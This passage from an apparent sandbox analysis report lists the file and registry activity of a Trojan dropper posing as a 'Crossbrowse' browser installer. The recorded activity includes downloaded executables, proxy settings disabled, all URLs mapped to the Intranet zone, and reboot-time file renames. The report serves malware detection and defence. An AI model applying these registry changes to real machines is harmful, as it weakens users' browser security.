%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\secondarytile.png (3 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\tr.pak (221 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin (4 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\master_preferences (814 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\chrome_100_percent.pak (7386 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\VisualElementsManifest.xml (394 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\pdf.dll (67091 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\chrome.dll (237340 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\sw.pak (208 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\39.6.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\de.pak (225 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\lv.pak (226 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\libegl.dll (204 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\am.pak (302 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\en-US.pak (189 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\39.6.2171.95\Locales\sk.pak (230 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\5185\prefs (0 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin (0 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp (0 bytes)
%Program Files%\Crossbrowse\Crossbrowse (0 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\wow_helper.exe (0 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179 (0 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Temp\source700_11179\Chrome-bin\crossbrowse.exe (0 bytes)
The process %original file name%.exe:468 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa6.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscF.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb14.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst13.tmp (123415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\cmmdWriter[1].exe (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss23.tmp (63911 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj2.tmp (17497 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy19.tmp (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk1A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7121923af824073a25b2b7e6ba0a6e0e[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz2A.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy24.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bseLbpD9T[1].exe (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\CZPOAqqx9[1] (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu5.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi18.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi17.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst12.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Cdn[1].exe (63911 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\vos[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\installer[1].exe (123415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmB.tmp (9352 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2B.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw20.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsrC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj29.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf2B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
The process nsmB.tmp:640 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsxE.tmp (5397 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nshD.tmp (0 bytes)
Registry activity
The process nsy19.tmp:1136 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 DE 0D 5C 09 A9 10 5F 8E A3 8D 9C 96 97 5E 39"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security zone settings to map all local web nodes with no dots (names not assigned to any zone) to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process 9035.exe:796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\5185]
"setup.exe" = "Crossbrowse Installer"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "Tempo"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\CrossBrowser]
"Installation" = "1"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 5D 15 FC 2D A9 37 2A 51 A8 80 F7 D0 D8 59 02"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security zone settings to map all local web nodes with no dots (names not assigned to any zone) to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Tempo]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsq1C.tmp:976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B4 E7 FF 48 5C 86 60 A0 49 7D 12 E3 B4 F4 49 6C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr1F.tmp\registry.dll,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "M"
The process nsq1C.tmp:1312 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr1F.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr1F.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh22.tmp\registry.dll,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "S"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 5B 3C BE 65 12 B7 69 5F DD A9 A5 D5 3D FB 44"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE security zone settings to map all local web nodes with no dots (names not assigned to any zone) to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\InternetTurbo]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsz2A.tmp:784 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D C3 F0 97 D0 0D B6 7B 4F 1C E5 DF 96 CD 4C 5F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process nss23.tmp:516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 E8 60 9A B0 49 A2 6D 2C F0 0D E4 49 95 62 B0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr1F.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr1F.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh22.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsh22.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz27.tmp\nsProcess.dll,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
